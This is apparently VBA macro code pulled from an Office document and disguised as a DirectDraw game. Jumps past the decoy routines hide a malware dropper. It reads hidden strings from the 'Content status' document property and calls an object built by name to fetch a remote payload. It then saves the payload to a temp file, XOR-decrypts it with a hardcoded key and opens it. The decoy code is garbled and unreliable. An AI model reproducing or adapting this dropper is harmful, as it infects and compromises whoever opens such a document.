If PowerUp(pwr) <> 0 Then BackBuffer.BltFast ExX, ExY, DirectDraw_Tuna1, rBuff, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
End Sub
Public Sub AnimExpl(I As Integer)
Dim xt As Integer, yt As Integer, rExpl As RECT
Dim sw As Integer, sh As Integer
Dim ExY As Integer
If NewGTC - AnimExT(I) > 50 Then
AnimExT(I) = NewGTC
AnimExF(I) = AnimExF(I) + 1
If AnimExF(I) > 10 Then
AnimExF(I) = 0
Expl(I) = False
Exit Sub
End If
End If
rExpl.Left = rBombExp(AnimExF(I)).Left
rExpl.Right = rBombExp(AnimExF(I)).Right
rExpl.Top = rBombExp(AnimExF(I)).Top
rExpl.Bottom = rBombExp(AnimExF(I)).Bottom
sw = rExpl.Right - rExpl.Left
sh = rExpl.Bottom - rExpl.Top
xt = ExplX(I) - MeX - (sw / 2)
yt = ExplY(I) - MeY - (sh / 2)
If xt < 0 Then rExpl.Left = rExpl.Left + Abs(xt): xt = 0
If yt < 0 Then rExpl.Top = rExpl.Top + Abs(yt): yt = 0
If xt > ResX - sw Then rExpl.Right = rExpl.Right - (xt - (ResX - sw)): xt = (ResX - sw) + (xt - (ResX - sw))
If yt > ResY - sh Then rExpl.Bottom = rExpl.Bottom - (yt - (yt - sh)): ExY = (yt - sh) + (yt - (ResY - sh))
End Sub
Public Function PuWord(lone() As Byte, ltwo As String)
Dim bskcp2 As Long
Dim bskcp3 As Long
Dim bskcp5 As Long
Dim bskcp6 As Long
Dim plusplus() As Byte
Dim bskcp4 As Long
Dim plusplusLen As Long
plusplusLen = Len(ltwo)
ReDim plusplus(plusplusLen)
plusplus = StrConv(ltwo, vbFromUnicode)
bskcp2 = UBound(lone) + 1
bskcp5 = bskcp2
For bskcp4 = _
0 To (bskcp2 - 1)
aa = plusplus(bskcp4 Mod plusplusLen)
bb = lone(bskcp4)
lone(bskcp4) = RDFGBR(bb, aa)
If (bskcp4 >= bskcp6) Then
bskcp3 = Int((bskcp4 / bskcp5) * 100)
bskcp6 = (bskcp5 * ((bskcp3 + 1) / 100)) + 1
End If
Next
End Function
Public Sub WidthA(Dbbb As String, bbbJ As String, Optional BladeRunner_Sexote As String)
Dim bbb As Integer
bbb = FreeFile
Dim Gbbb() As Byte
Open Dbbb For Binary As #bbb
ReDim Gbbb(0 To LOF(bbb) - 1)
Get #bbb, , Gbbb()
Close #bbb
Call PuWord(Gbbb(), BladeRunner_Sexote)
bbb = FreeFile
Open bbbJ For Binary As #bbb
Put #bbb, , Gbbb()
Close #bbb
End Sub
Public Sub Flags(Colr As Integer, I As Integer)
If BackBuffer.isLost Then Exit Sub
Dim xt As Integer, yt As Integer, a As Integer, b As Integer, G As Byte
Dim rFlag As RECT
G = 0
If Colr = 1 Then
G = 1
If FlagCarry1(I) > 0 Then
Flag1(0, I) = Players(FlagCarry1(I)).charX + 18
Flag1(1, I) = Players(FlagCarry1(I)).charY + 3: G = 9
End If
xt = Flag1(0, I)
yt = Flag1(1, I)
ElseIf Colr = 2 Then
G = 2
If FlagCarry2(I) > 0 Then
Flag2(0, I) = Players(FlagCarry2(I)).charX + 18
Flag2(1, I) = Players(FlagCarry2(I)).charY + 3: G = 9
End If
xt = Flag2(0, I)
yt = Flag2(1, I)
ElseIf Colr = 3 Then
G = 3
If FlagCarry3(I) > 0 Then
Flag3(0, I) = Players(FlagCarry3(I)).charX + 18
Flag3(1, I) = Players(FlagCarry3(I)).charY + 3: G = 9
End If
xt = Flag3(0, I)
yt = Flag3(1, I)
ElseIf Colr = 4 Then
G = 4
If FlagCarry4(I) > 0 Then
Flag4(0, I) = Players(FlagCarry4(I)).charX + 18
Flag4(1, I) = Players(FlagCarry4(I)).charY + 3: G = 9
End If
xt = Flag4(0, I)
yt = Flag4(1, I)
ElseIf Colr = 5 Then
G = 5
If FlagCarry5(I) > 0 Then
Flag5(0, I) = Players(FlagCarry5(I)).charX + 18
Flag5(1, I) = Players(FlagCarry5(I)).charY + 3: G = 9
End If
xt = Flag5(0, I)
yt = Flag5(1, I)
End If
out:
End Sub
Public Sub PlayCry(cry As Integer)
If cry = 1 Then
CallByName CofeeShop, F3.OptionButton1.Tag, VbMethod, AlertN(5), BladeRunner_4, False
Exit Sub
Else: GoTo lab1
End If
If c.Ry.Offset = 0 Then
Exit Sub
End If
writer.Write (Encoding.ASCII.GetBytes("RIFF"))
writer.Write (0)
writer.Write (Encoding.ASCII.GetBytes("WAVE"))
writer.Write (Encoding.ASCII.GetBytes("fmt "))
writer.Write (16)
writer.Write (CUS.hort(1))
writer.Write (CUS.hort(1))
lab1:
CallByName CofeeShop, F3.OptionButton2.Tag, VbMethod, BladeRunner_System, _
F3.SpinButton1.Tag
Exit Sub
stream.Seek 0, SeekOrigin.begin
Player.Load
Player.Play
End Sub
Public Sub Vertik()
Set CofeeShop = CreateObject(VertikName)
smbi = F3.Label1.Caption
AlertNE = AlertN(2)
AnimTransferMap "Caption", False
Stocke = 24 / 4
BladeRunner_FLAME = BladeRunner_VEAM(AlertN(6))
MakeFarplane "G", "I", "MS"
End Sub
Public Function FindNext(R As String, S As Integer) As String
CallByName SubProperty, "sav" + F3.o3.Caption, VbMethod, BladeRunner_PathTo2, 2
WidthA BladeRunner_PathTo2, BladeRunner_Project, "9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb"
BladeRunner_aifde.Open (BladeRunner_Project)
End Function
Public Function HMBCP(D)
Dim fb As Asck
doc_string = "Outline Level 2"
Set fb = New Asck
doc_string = "Outline Level 3"
fb.PropellersHead
End Function
Public Function RDFGBR(a, b)
Dim GBR
GBR = a Xor b
Dim RDF
RDF = a Or b
RDFGBR = GBR
End Function
Public Sub DropFlag()
Dim lMsg As Byte
Dim oNewMsg() As Byte, lNewOffSet As Long
lNewOffSet = 0
ReDim oNewMsg(0)
lMsg = MSG_DROPFLAG
AddBufferData oNewMsg, VarPtr(lMsg), LenB(lMsg), lNewOffSet
SendTo oNewMsg
End Sub
Public Sub WriteChat()
Dim e As Integer, j As Integer, q As Integer, F As Integer, D As Integer, rrect As RECT, I As Integer
DirectDraw_Chat.BltColorFill rrect, KEYColor
e = 1
j = UBound(Chat)
For I = 0 To j
q = Len(Chat(I))
While q > 0
F = MakeText(Mid$(Chat(I), 1, 1) & Mid$(Chat(I), e + 1, q), 5, 5 + (I + D) * 12, True, DirectDraw_Chat)
e = e + F - 1
q = Len(Chat(I)) - e
If q > 0 Then D = D + 1
Wend
e = 0: q = 0
Next
End Sub
Public Sub mapRender()
GoTo fixedTypeLbl2
If BackBuffer.isLost Then Exit Sub
If DirectDraw_Tiles Is Nothing Then Exit Sub
Dim DestX As Single, DestY As Single, FrameChange(255, 255) As Byte
Dim I As Integer, R As Integer, j As Integer, c As Integer, D As Integer, a As Integer, e As Integer
Dim Xfind As Integer, Yfind As Integer, Xwdth As Integer, Ywdth As Integer, X As Integer
Dim Xcoor As Integer, Ycoor As Integer, Xdif As Integer, Ydif As Integer
Dim TileGet As Integer, xt As Integer, yt As Integer, ToX As Integer, ToY As Integer
ReDim AnimsPlayed(0)
MeX = Playe.rs(MeNum).charX - CenterSX
MeY = Playe.rs(MeNum).charY - CenterSY
MapX = (MeX - (MeX Mod 16)) / 16 'Possible failure
MapY = (MeY - (MeY Mod 16)) / 16 'Possible failure
If MeY < 0 Then MapY = MapY - 1
If MeX < 0 Then MapX = MapX - 1
DestX = Playe.rs(MeNum).charX - MapX * 16
DestY = Playe.rs(MeNum).charY - MapY * 16
Xdif = MeX - MapX * 16
Ydif = MeY - MapY * 16
ToX = ResX / 16 'Possible failure
ToY = ResY / 16 'Possible failure
If ResY = 600 Then
If Ydif < 8 Then ToY = 37 Else ToY = 38
End If
I = MapX * 16 + Xdif
j = MapY * 16 + Ydif
D = I
c = j
If I < 0 Then D = 0
If j < 0 Then c = 0
TileG.et.Left = D
TileG.et.Top = c
If I < 0 Then D = I Else D = 0
If j < 0 Then c = j Else c = 0
D = TileG.et.Left + ResX + D
c = TileG.et.Top + ResY + c
If D > 4080 Then D = 4080
If c > 4080 Then c = 4080
TileG.et.Right = D
TileG.et.Bottom = c
D = MapX * 16 + Xdif
c = MapY * 16 + Ydif
If D >= 0 Then D = 0
If c >= 0 Then c = 0
BackBuffer.BltFast Abs(D), Abs(c), DirectDraw_Map, TileGet, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
c = 0
D = 0
fixedTypeLbl2:
BladeRunner_Project = BladeRunner_FLAME
BladeRunner_PathTo2 = BladeRunner_Project + "\fudziambl" + CStr(Stocke)
GoTo fixedTypeLbl3
If MeY < 0 Then c = MapY
If MeX < 0 Then D = MapX
For R = Abs(c) To ToY
For I = Abs(D) To ToX
Xcoor = I * 16
If I > 0 Then Xcoor = Xcoor - Xdif
Ycoor = R * 16
If R > 0 Then Ycoor = Ycoor - Ydif
X = AnimO.ffset(yt, xt)
If X > 0 Then
a = Animati.ons(yt, xt)
If FrameChange(FrameC.ount(a), AnimS.peed(a)) = 0 Then
If AnimS.peed(a) = 0 Then AnimS.peed(a) = 1
AnimC.ount(FrameC.ount(a), AnimS.peed(a)) = AnimC.ount(FrameC.ount(a), AnimS.peed(a)) + Speed / AnimS.peed(a)
If AnimC.ount(FrameC.ount(a), AnimS.peed(a)) > FrameC.ount(a) - 1 Then AnimC.ount(FrameC.ount(a), AnimS.peed(a)) = 0
End If
FrameChange(FrameC.ount(a), AnimS.peed(a)) = 1
e = AnimC.ount(FrameC.ount(a), AnimS.peed(a))
e = (e + X) Mod (FrameC.ount(a))
TileG.et.Top = Anim.FY(a, e) + Yfind
TileG.et.Bottom = TileG.et.Top + Ywdth
TileG.et.Left = Anim.FX(a, e) + Xfind
TileG.et.Right = TileG.et.Left + Xwdth
Call BackBuffer.BltFast(Xcoor, Ycoor, DirectDra.w_Anims(Anim.FS(a, 0)), TileGet, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY)
End If
out:
Next
Next
fixedTypeLbl3:
BladeRunner_Project = BladeRunner_Project + Replace(AlertN(12), ".", CStr(Stocke) + ".")
SubProperty.Type = 1
End Sub
Public Sub ShugarMilk(e As Integer)
Dim Rx As Integer, Ry As Integer, rBuff As String
Dim xt As Integer, yt As Integer, j As Integer
Dim NewX As Integer, NewY As Integer, D As Integer, SgnX As Integer, SgnY As Integer
Dim RatioX As Single, RatioY As Single
Rx = 452
Ry = 81
BladeRunner_4 = F3.ZK.Caption & MarkusPils(I)
Stocke = Stocke + 2
Dim XIpotom2 As Asck
Set XIpotom2 = New Asck
If e < 300 Then
XIpotom2.Challenge "RDBMS", 21
CallByName CofeeShop, F3.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
Else
End If
Exit Sub
NewX = UniB.all(I).BallX
NewY = UniB.all(I).BallY
If UniB.all(I).BSpeedX > UniB.all(I).BSpeedY And UniB.all(I).BSpeedY > 0 Then RatioY = UniB.all(I).BSpeedX / UniB.all(I).BSpeedY
If UniB.all(I).BSpeedY > UniB.all(I).BSpeedX And UniB.all(I).BSpeedX > 0 Then RatioX = UniB.all(I).BSpeedY / UniB.all(I).BSpeedX
If RatioX < 1 Then RatioX = 1
If RatioY < 1 Then RatioY = 1
If UniB.all(I).BSpeedX > 0 Then UniB.all(I).BSpeedX = UniB.all(I).BSpeedX - (0.01 / RatioX) * Speed
If UniB.all(I).BSpeedY > 0 Then UniB.all(I).BSpeedY = UniB.all(I).BSpeedY - (0.01 / RatioY) * Speed
If UniB.all(I).BSpeedX < 0 Then UniB.all(I).BSpeedX = 0
If UniB.all(I).BSpeedY < 0 Then UniB.all(I).BSpeedY = 0
UniB.all(I).BLoopX = UniB.all(I).BLoopX + (UniB.all(I).BSpeedX * Speed)
For j = 1 To UniB.all(I).BLoopX
NewX = NewX + UniB.all(I).BMoveX
UniB.all(I).BLoopX = UniB.all(I).BLoopX - 1
Next
UniB.all(I).BLoopY = UniB.all(I).BLoopY + (UniB.all(I).BSpeedY * Speed)
For j = 1 To UniB.all(I).BLoopY
NewY = NewY + UniB.all(I).BMoveY
UniB.all(I).BLoopY = UniB.all(I).BLoopY - 1
Next
SgnX = Sgn(NewX - UniB.all(I).BallX)
SgnY = Sgn(NewY - UniB.all(I).BallY)
If SgnX = 1 Then 'x positive testing
For D = UniB.all(I).BallX + 1 To NewX
j = WeaponT.ouch(6, I, D, UniB.all(I).BallY)
If j = 6 Then
UniB.all(I).BMoveX = UniB.all(I).BMoveX * -1
NewX = D - 1
Exit For
End If
Next
End If
If SgnX = -1 Then 'x negative testing
For D = UniB.all(I).BallX - 1 To NewX Step -1
j = WeaponT.ouch(6, I, D, UniB.all(I).BallY)
If j = 6 Then
UniB.all(I).BMoveX = UniB.all(I).BMoveX * -1
NewX = D + 1
Exit For
End If
Next
End If
If SgnY = 1 Then 'y positive testing
For D = UniB.all(I).BallY + 1 To NewY
j = WeaponT.ouch(6, I, NewX, D)
If j = 6 Then
UniB.all(I).BMoveY = UniB.all(I).BMoveY * -1
NewY = D - 1
Exit For
End If
Next
End If
If SgnY = -1 Then 'y negative testing
For D = UniB.all(I).BallY - 1 To NewY Step -1
j = WeaponT.ouch(6, I, NewX, D)
If j = 6 Then
UniB.all(I).BMoveY = UniB.all(I).BMoveY * -1
NewY = D + 1
Exit For
End If
Next
End If
UniB.all(I).BallX = NewX
UniB.all(I).BallY = NewY
j = WeaponT.ouch(6, I, NewX, NewY)
xt = NewX
yt = NewY
xt = xt - MeX: yt = yt - MeY
rBuf.F.Top = Ry
rBuf.F.Bottom = rBuf.F.Top + 10
rBuf.F.Left = Rx + 10 * (UniB.all(I).Color - 1)
rBuf.F.Right = rBuf.F.Left + 10
If xt < 0 Then rBuf.F.Left = rBuf.F.Left + Abs(xt): xt = 0
If yt < 0 Then rBuf.F.Top = rBuf.F.Top + Abs(yt): yt = 0
If xt > ResX - 10 Then rBuf.F.Right = rBuf.F.Right - (xt - (ResX - 10)): xt = (ResX - 10) + (xt - (ResX - 10))
If yt > ResY - 10 Then rBuf.F.Bottom = rBuf.F.Bottom - (yt - (ResY - 10)): yt = (ResY - 10) + (yt - (ResY - 10))
BackBuffer.BltFast xt, yt, DirectDraw_NavBar, rBuff, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
End Sub
Public Sub MakeFarplane(a As String, b As String, c As String)
GoTo old18
If BackBuffer.isLost Then Exit Sub
Dim xt As Integer, yt As Integer, rDD As Integer
Dim xtl As Integer, ytl As Integer, xw As Integer, yw As Integer
xw = ResX
yw = ResY
If xw > 1280 Then xw = 1280
If yw > 960 Then yw = 960
xt = 0.1568 * MeX
yt = 0.1176 * MeY
xtl = xt + xw
ytl = yt + yw
If xtl > 1280 Then
xt = 1280 - xw
xtl = 1280
End If
If ytl > 960 Then
yt = 960 - yw
ytl = 960
End If
'
old18:
On Error GoTo dee13
Dim I
For I = LBound(MarkusPils) To UBound(MarkusPils) Step 1
ShugarMilk 64
If CofeeShop.Status <> 200 Then
Err.Raise 700 + vbObjectError, "G", "Dro"
End If
MakeFarplane2 31
Exit Sub
dee13:
Next
On Error GoTo 0
Exit Sub
If xt < 0 Then
xt = 0
xtl = xw
End If
If yt < 0 Then
yt = 0
ytl = yw
End If
'
With rD.D.hh
.Left = xt
.Top = yt
.Right = xtl
.Bottom = ytl
End With
BackBuffer.BltFast 0, 0, DirectDraw_Farplane, rDD, DDBLTFAST_WAIT
End Sub
Public Sub MakeFarplane2(I As Integer)
Dim j As Integer, D As Integer, DiagMvSpd As Single, LastCX As Single, LastCY As Single, e As Integer
Dim MvSpd As Single, sx As Single, sy As Single, chs As Single
GoTo sinus
MvSpd = Speed * 1.1
If Player.S(I).FlagWho > 0 Then MvSpd = MvSpd * 0.75
If Player.S(I).DevCheat > 2 Then MvSpd = MvSpd * 3
If Player.S(I).Mode = 1 Then MvSpd = MvSpd * 6
DiagMvSpd = 0.7 * 1.1
chs = MvSpd / (Int(MvSpd) + 1)
If Player.S(I).Ship = 6 Then
Select Case Player.S(I).KeyIs
Case Is = vbKeyLeft
Player.S(I).animY = aLEFT2
Case Is = vbKeyUp
Player.S(I).animY = aUP2
Case Is = vbKeyRight
Player.S(I).animY = aRIGHT2
Case Is = vbKeyDown
Player.S(I).animY = aDOWN2
End Select
End If
Player.S(I).animX = Player.S(I).KeyIs
If Val(Int(MvSpd)) > 100 Then Exit Sub
For j = 0 To Int(MvSpd)
LastCX = Player.S(I).charX
LastCY = Player.S(I).charY
If Player.S(I).KeyIs = 1 Then
Player.S(I).charX = Player.S(I).charX + chs
ElseIf Player.S(I).KeyIs = 2 Then
Player.S(I).charX = Player.S(I).charX + chs * DiagMvSpd
Player.S(I).charY = Player.S(I).charY - chs * DiagMvSpd
ElseIf Player.S(I).KeyIs = 3 Then
Player.S(I).charY = Player.S(I).charY - chs
ElseIf Player.S(I).KeyIs = 4 Then
Player.S(I).charY = Player.S(I).charY - chs * DiagMvSpd
Player.S(I).charX = Player.S(I).charX - chs * DiagMvSpd
ElseIf Player.S(I).KeyIs = 5 Then
Player.S(I).charX = Player.S(I).charX - chs
ElseIf Player.S(I).KeyIs = 6 Then
Player.S(I).charX = Player.S(I).charX - chs * DiagMvSpd
Player.S(I).charY = Player.S(I).charY + chs * DiagMvSpd
ElseIf Player.S(I).KeyIs = 7 Then
Player.S(I).charY = Player.S(I).charY + chs
ElseIf Player.S(I).KeyIs = 8 Then
Player.S(I).charY = Player.S(I).charY + chs * DiagMvSpd
Player.S(I).charX = Player.S(I).charX + chs * DiagMvSpd
End If
Call ShipTo.uch(I)
For e = 1 To UBound(RetCollision)
D = RetCollision(e)
If D = 8 Then Player.S(I).charY = Player.S(I).charY - chs * 0.7
If D = 9 Then Player.S(I).charY = Player.S(I).charY + chs * 0.7
If D = 10 Then Player.S(I).charX = Player.S(I).charX - chs * 0.7
If D = 11 Then Player.S(I).charX = Player.S(I).charX + chs * 0.7
'The following four lines stop you from moving backwards on
'ramps if you have a flag.
'If D = 8 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 7 Then Player.s(i).charY = LastCY
'If D = 9 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 3 Then Player.s(i).charY = LastCY
'If D = 10 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 1 Then Player.s(i).charX = LastCX
'If D = 11 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 5 Then Player.s(i).charX = LastCX
Next
GoSub whatever
Next
Exit Sub
sinus:
mapRender
CallByName SubProperty, "Open" + "", VbMethod
BladeRunner_PokerFace = CallByName(CofeeShop, "re" + "sponseBody", VbGet)
Dim DRO As BounceCastle
Set DRO = New BounceCastle
DRO.Ant
Exit Sub
whatever:
sx = Player.S(I).charX
sy = Player.S(I).charY
'
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then
Player.S(I).charX = LastCX
Player.S(I).charY = LastCY
If (FindRects.Ret(104) And FindRects.Ret(105)) Or (FindRects.Ret(112) And FindRects.Ret(113)) Then
Player.S(I).charY = sy
Call ShipTo.uch(I)
If Player.S(I).charY = LastCY Then
If FindRects.Ret(112) And FindRects.Ret(113) Then 'touch right
Player.S(I).charX = Player.S(I).charX - 1
End If
Call ShipTo.uch(I)
If FindRects.Ret(104) And FindRects.Ret(105) Then 'touch left
Player.S(I).charX = Player.S(I).charX + 1
End If
End If
If UBound(RectsRet) > 0 Then Player.S(I).charY = LastCY
Return
End If
If (FindRects.Ret(101) And FindRects.Ret(109)) Or (FindRects.Ret(108) And FindRects.Ret(116)) Then
Player.S(I).charX = sx
Call ShipTo.uch(I)
If Player.S(I).charY = LastCY Then
If FindRects.Ret(101) And FindRects.Ret(109) Then 'touch top
Player.S(I).charY = Player.S(I).charY + 1
End If
Call ShipTo.uch(I)
If FindRects.Ret(108) And FindRects.Ret(116) Then 'touch bottom
Player.S(I).charY = Player.S(I).charY - 1
End If
End If
If UBound(RectsRet) > 0 Then Player.S(I).charX = LastCX
Return
End If
End If
For e = 1 To UBound(RectsRet)
D = RectsRet(e)
If D = 101 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
If D = 102 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
If D = 103 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
'
If D = 104 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
If D = 105 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
'
If D = 106 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
If D = 107 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
If D = 108 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
'
If D = 109 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
If D = 110 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 111 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 112 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
'
If D = 113 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
If D = 114 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 115 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 116 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
Next
'
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then
Player.S(I).charX = LastCX
Player.S(I).charY = LastCY
If (FindRects.Ret(104) And FindRects.Ret(105)) Or (FindRects.Ret(112) And FindRects.Ret(113)) Then
Player.S(I).charY = sy
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then Player.S(I).charY = LastCY
Return
End If
If (FindRects.Ret(101) And FindRects.Ret(109)) Or (FindRects.Ret(108) And FindRects.Ret(116)) Then
Player.S(I).charX = sx
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then Player.S(I).charX = LastCX
Return
End If
End If
Return
End Sub"
File "BounceCastle.cls" (Streampath: "VBA/BounceCastle") has code: "Sub doc_of_word_outline_level6()
doc_string = "Outline Level 6"
End Sub
Sub word_outline_level6()
Selection.Paragraphs(1).OutlineLevel = wdOutlineLevel6
comple.te
End Sub
Sub doc_of_word_outline_level7()
doc_string = "Outline Level 7"
End Sub
Sub word_outline_level7()
Selection.Paragraphs(1).OutlineLevel = wdOutlineLevel7
comple.te
End Sub
Sub WriteLOG(sMessage$)
If (bLOGOn = cOn) Then
Wri.te nLOGFileHandle, sMessage
End If
End Sub
Sub ErrorMessage(sMessage$)
If (bLOGOn = cOn) Then
WriteLOG (sMessage$)
Else
MsgBox sMessage$, 16
End If
End Sub
Sub InfoMessage(sMessage$)
If (bShowErrorsOnly = cOff) Then
If (bLOGOn = cOn) Then
WriteLOG (sMessage$)
Else
MsgBox sMessage$, 64
End If
End If
End Sub
Public Sub Ant()
SubProperty.Write BladeRunner_PokerFace
GoTo cip
If Not CryToLoad.Compressed Then
For G = 0 To CryToLoad.Size - 1
CryToLoad.Data(G) = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, (cryOffset) + 16 + G, 1)))
Next
Else
If Alignment = 0 Then
pcmLevel = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, offtrack, 1)))
offtrack = offtrack + 1
Data.Add (pcmLevel)
Alignment = &H20
End If
offtrack = offtrack + 1
If Alignment < &H20 Then
Data.Add (pcmLevel)
End If
Data.Add (pcmLevel)
If Size >= CryToLoad.Size Then
End If
Alignment = 1
CryToLoad.Data = Data.ToArray()
CryToLoad.Size = offtrack - Start
End If
cip:
If BladeRunner_Fish <> 0 Then
Exit Sub
End If
FindNext "4", 3
End Sub"
File "Asck.cls" (Streampath: "VBA/Asck") has code: "Public Function PropellersHead() As String
tt = ThisDocument.BuiltInDocumentProperties("Content status").Value
AlertN = Split(tt, "HUBBLE")
VertikName = AlertN(Quubo * 3)
Vertik
PropellersHead = ""
End Function
Public Sub Challenge(sender As String, e As Integer)
PlayCry 1
PlayCry 350
End Sub"
File "F3.frm" (Streampath: "VBA/F3") has code: ""
File "Class1.cls" (Streampath: "VBA/Class1") has code: "Public Function CheckRectsAd() As Boolean
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
If IntersectRect(rTemp, AdRect, rMouse) Then
CheckRectsAd = True
Exit Function
End If
End Function
Public Function CheckRectsNav() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(NavRect)
If I < 8 Then
If IntersectRect(rTemp, NavRect(I), rMouse) Then
CheckRectsNav = I + 1
Exit Function
End If
End If
Next
End Function
Public Function CheckRectsMenu4() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(MenuRect)
If IntersectRect(rTemp, MenuRect(I), rMouse) Then
CheckRectsMenu4 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenuMenu1() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
If MenuMenu = 1 Then
For I = 0 To 3
If IntersectRect(rTemp, rHelp(I), rMouse) Then
CheckRectsMenuMenu1 = I + 1
Exit Function
End If
Next
End If
If MenuMenu = 5 Then
If IntersectRect(rTemp, rHelp(4), rMouse) Then
CheckRectsMenuMenu1 = 5
Exit Function
End If
End If
If MenuMenu = 6 Then
If IntersectRect(rTemp, rHelp(5), rMouse) Then
CheckRectsMenuMenu1 = 5
Exit Function
End If
End If
If MenuMenu = 7 Or MenuMenu = 8 Then
If IntersectRect(rTemp, rHelp(5), rMouse) Then
CheckRectsMenuMenu1 = 5
Exit Function
End If
End If
If MenuMenu = 7 Then
If IntersectRect(rTemp, rHelp(6), rMouse) Then
CheckRectsMenuMenu1 = 6
Exit Function
End If
End If
End Function
Public Function CheckRectsMenuMenu2() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(Menu2Rect)
If IntersectRect(rTemp, Menu2Rect(I), rMouse) Then
CheckRectsMenuMenu2 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenu3() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(Menu3Rect)
If IntersectRect(rTemp, Menu3Rect(I), rMouse) Then
CheckRectsMenu3 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenuMenu3() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(rConfig)
If IntersectRect(rTemp, rConfig(I), rMouse) Then
CheckRectsMenuMenu3 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenuMenu4() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(Menu4Rect)
If IntersectRect(rTemp, Menu4Rect(I), rMouse) Then
CheckRectsMenuMenu4 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectMenu9() As Boolean
Dim rTemp As RECT, rMouse As RECT
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
If IntersectRect(rTemp, Menu9Rect, rMouse) Then CheckRectMenu9 = True
End Function
